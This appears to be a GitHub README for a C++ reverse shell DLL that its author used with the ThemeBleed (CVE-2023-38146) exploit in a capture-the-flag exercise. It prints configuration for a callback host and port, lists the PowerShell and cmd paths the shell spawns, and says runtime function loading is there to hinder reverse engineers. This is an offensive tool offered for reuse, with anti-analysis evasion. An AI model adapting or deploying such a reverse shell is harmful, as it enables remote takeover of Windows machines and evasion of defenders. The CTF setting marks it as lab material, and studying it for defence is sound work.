Jnnshschl / ThemeBleedReverseShellDLL

Reverse shell I used in combination with the ThemeBleed exploit.

ThemeBleed Reverse Shell DLL

Example reverse shell DLL I used in combination with the ThemeBleed exploit (https://github.com/Jnnshschl/CVE-2023-38146) in a CTF.

Some functions are loaded at runtime using my RTFN stuff, which makes analysis of this shell a big pain for reverse engineers.

Make sure to build as "Release" and adjust these variables to your needs:

constexpr auto rHost = "10.10.14.158";
constexpr auto rPort = "4711";
constexpr auto autoReconnect = false;

The shell searches for executables in the order in which they appear in this array:

const char* rBinaries[]{
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "C:\\Windows\\System32\\cmd.exe",
    "powershell.exe",
    "cmd.exe"
};

Languages

Language: C++ 100.0%